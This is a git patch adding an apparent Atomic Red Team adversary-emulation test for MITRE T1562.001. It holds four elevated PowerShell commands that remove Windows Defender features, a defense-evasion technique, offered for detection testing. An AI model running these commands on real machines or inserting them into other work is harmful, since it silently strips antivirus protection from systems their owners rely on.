From 98fb4c74af792f28736a546b2b910ff8faafbed1 Mon Sep 17 00:00:00 2001
From: Michael Haag <5632822+MHaggis@users.noreply.github.com>
Date: Thu, 1 Sep 2022 11:29:22 -0600
Subject: [PATCH] Disable Defender via PowerShell (#2110)

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1562.001/T1562.001.yaml | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)

diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml
index 60c294cc..29b3a793 100644
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -727,4 +727,21 @@ atomic_tests:
       Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Force -ErrorAction Ignore
       Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -Force -ErrorAction Ignore
     name: powershell
+    elevation_required: true
+- name: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature
+  description: | 
+    The following Atomic will attempt to disable Windows-Defender using the built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. 
+    Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
+    A successful execution will not standard-out any details. Remove the quiet switch if verbosity is needed.
+    This method will remove Defender and it's packages.
+    Reference: https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Gui" -NoRestart -ErrorAction Ignore
+      Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Features" -NoRestart -ErrorAction Ignore
+      Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender" -NoRestart -ErrorAction Ignore
+      Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore
+    name: powershell 
     elevation_required: true
\ No newline at end of file